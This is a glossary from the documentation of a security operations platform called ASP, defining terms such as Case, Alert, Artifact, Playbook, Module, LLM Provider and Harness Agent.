Glossary
| Term | Meaning |
|---|---|
| Case | A security case, the primary object for managing and tracking the security incident handling process. Contains status, severity, priority, disposition, assignee, summary, AI investigation report, discussion, and associated Playbook. |
| Alert | An alert, typically from SIEM, EDR, cloud platforms, or Webhook. Alert is associated with Case and preserves context such as rules, products, MITRE, and raw logs; analysts typically investigate based on alerts and do not directly modify alert data. |
| Artifact | An entity, evidence item, or IOC related to a security incident, such as IP, domain, URL, file hash, account, host, process, etc. Queries, responses, and enrichment typically revolve around Artifact. |
| Enrichment | Enrichment results, recording external context such as threat intelligence, reputation, assets, identity, history, and response recommendations. |
| Knowledge | Knowledge, supports manual maintenance and can also be extracted from investigation records and discussions of closed Cases. Used to accumulate reusable security experience for SOC teams and can be called by AI Agent. |
| Playbook | An automation task record. Currently triggered from Case, records playbook name, user input, execution status, and background task ID. Common statuses include Pending, Running, Success, Failed. |
| Investigation Report | A structured investigation report generated by AI analysis, typically containing disposition, attack chain, IOC, impact, and remediation recommendations. |
| Raw Log | The raw log content of an Alert, typically stored in JSON, used for tracing alert sources and complete context. |
| Unmapped Data | Data in the raw alert that is not mapped to standard fields. It preserves original information but is typically not the focus of default AI analysis. |
| Module | A Python alert processing script for streaming alert processing. Module extracts fields and IOC from alert messages, performs correlation and aggregation, and generates or updates Case, Alert, and Artifact. |
| User Input | Natural language supplementary requirements provided by users when executing Playbook, which LLM or automation tasks reference during execution. |
| Inbox | In-app messages, used to send system or user messages to users, can associate resources and attachments. |
| Audit Log | Audit log, records resource creation, update, deletion, as well as changed fields and operators. |
| LLM Provider | Large model configuration item, containing name, Base URL, model, API Key, proxy, tags, and priority. |
| Runtime | Agentic runtime configuration, currently includes parameters such as prompt language and Stream length; default Prompt Language is en, Stream Maxlen is 10000. |
| Harness Agent | A Harness Agent that connects ASP capabilities through plugins and MCP. It can work around Case, Artifact, SIEM logs, threat intelligence, Module, and Playbook. |
| Webhook | An entry point for external SIEM or alert systems to connect to ASP, for example Splunk / Kibana alerts can enter the platform through Webhook. |
| ELK Index Action | An ingestion method where Kibana first writes actions to an Elasticsearch index, then ASP worker polls and converts them into alerts. |
| SIEM YAML | A YAML configuration describing Splunk / ELK indexes, fields, and default aggregation fields, used for Agent / MCP to understand and query logs. |
| Personal Center | Personal center, where current users maintain their profile, personal settings, password, and API Key. |